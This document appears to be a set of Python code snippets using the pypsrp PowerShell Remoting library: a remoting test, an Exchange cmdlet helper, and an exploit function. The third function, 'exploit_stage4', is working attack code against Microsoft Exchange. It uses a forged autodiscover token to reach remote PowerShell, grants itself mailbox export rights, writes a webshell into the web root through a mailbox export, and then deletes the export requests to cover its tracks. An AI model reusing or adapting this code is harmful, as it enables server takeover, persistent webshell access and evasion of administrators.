def test_psrp(self, functional_transports): for wsman in functional_transports: with RunspacePool(wsman) as pool: pool.exchange_keys() ps = PowerShell(pool) ps.add_cmdlet("Get-Item").add_parameter("Path", "C:\\Windows") ps.add_statement() sec_string = pool.serialize(u"super secret", ObjectMeta("SS")) ps.add_cmdlet("Set-Variable") ps.add_parameter("Name", "password") ps.add_parameter("Value", sec_string) ps.add_statement().add_script( "[System.Runtime.InteropServices.marshal]" "::PtrToStringAuto([System.Runtime.InteropServices.marshal]" "::SecureStringToBSTR($password))") ps.add_statement().add_cmdlet("ConvertTo-SecureString") ps.add_parameter("String", "host secret") ps.add_parameter("AsPlainText") ps.add_parameter("Force") large_string = "hello world " * 3000 ps.add_statement() ps.add_script("$VerbosePreference = 'Continue'; " "Write-Verbose '%s'" % large_string) actual = ps.invoke() assert ps.had_errors is False assert len(actual) == 3 assert str(actual[0]) == "C:\\Windows" assert actual[1] == u"super secret" assert actual[2] == u"host secret" assert str(ps.streams.verbose[0]) == large_string
def connection(self,scriptname,**kwargs): try: with RunspacePool(self.wsman, configuration_name="Microsoft.Exchange") as pool: ps = PowerShell(pool).add_cmdlet(scriptname) [ps.add_parameter(i,kwargs[i]) for i in kwargs] output = ps.invoke() if not ps.had_errors and not ps.streams.error: self.message,self.isSuccess,self.count = [i.adapted_properties for i in output],True,len(output) else: self.code,self.msg = 201,"%s".join([str(s) for s in ps.streams.error]) except Exception as e: self.msg,self.code = e,201
def exploit_stage4(target, auth_b64, alias_name, subject, fShell): logger.debug("[Stage 4] Dealing with WSMV") wsman = WSMan(server=target, port=443, path='/autodiscover/[email protected]/Powershell?X-Rps-CAT=' + auth_b64 +'&Email=autodiscover/autodiscover.json%[email protected]', ssl="true", cert_validation=False) logger.debug("[Stage 4] Dealing with PSRP") with RunspacePool(wsman, configuration_name="Microsoft.Exchange") as pool: logger.debug("[Stage 4] Assign Management Role") ps = PowerShell(pool) #ps.add_cmdlet("Get-User") ps.add_cmdlet("New-ManagementRoleAssignment") ps.add_parameter("Role", "Mailbox Import Export") ps.add_parameter("SecurityGroup", "Organization Management") output = ps.invoke() with RunspacePool(wsman, configuration_name="Microsoft.Exchange") as pool: logger.debug("[Stage 4] Exporting MailBox as Webshell") ps = PowerShell(pool) ps.add_cmdlet("New-MailboxExportRequest") ps.add_parameter("Mailbox", alias_name) ps.add_parameter("Name", subject) ps.add_parameter("ContentFilter", "Subject -eq '%s'" % (subject)) ps.add_parameter("FilePath", "\\\\127.0.0.1\\c$\\inetpub\\wwwroot\\aspnet_client\\%s" % fShell) output = ps.invoke() logger.debug("[Stage 4] Webshell Path: c:\\inetpub\\wwwroot\\aspnet_client\\%s" % fShell) with RunspacePool(wsman, configuration_name="Microsoft.Exchange") as pool: logger.debug("[Stage 4] Cleaning Notification") ps = PowerShell(pool) ps.add_script("Get-MailboxExportRequest | Remove-MailboxExportRequest -Confirm:$false") output = ps.invoke()